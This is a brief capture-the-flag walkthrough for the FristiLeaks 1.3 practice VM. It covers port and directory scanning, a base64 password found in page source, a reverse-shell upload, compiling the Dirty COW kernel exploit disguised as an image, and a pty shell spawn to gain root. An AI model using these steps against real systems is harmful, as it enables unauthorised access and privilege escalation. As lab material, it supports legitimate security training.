FristiLeaks 1.3 writeup - PacketMonkey22/boot2roots GitHub Wiki

nmap -A -T4 -p- $ip

Apache running

dirb -- bunch of drink names

tried a bunch of names including vm name - /fristi page

source code has comment with name and a base64 image

base64 was password

signed in

--- https://www.exploit-db.com/exploits/40839 ---

upload cow.png which is just above script to uploads.

uploaded reverse shell

made nc

ran this: gcc /var/www/html/fristi/uploads/cow.png -o sploit -pthread -lcrypt

ran this: /var/www/html/fristi/uploads/sploit -- made password test

waited five minutes

created new nc

cd /home

firefart exists and is root

python -c 'import pty;pty.spawn("/bin/bash")'

su firefart

test

am root.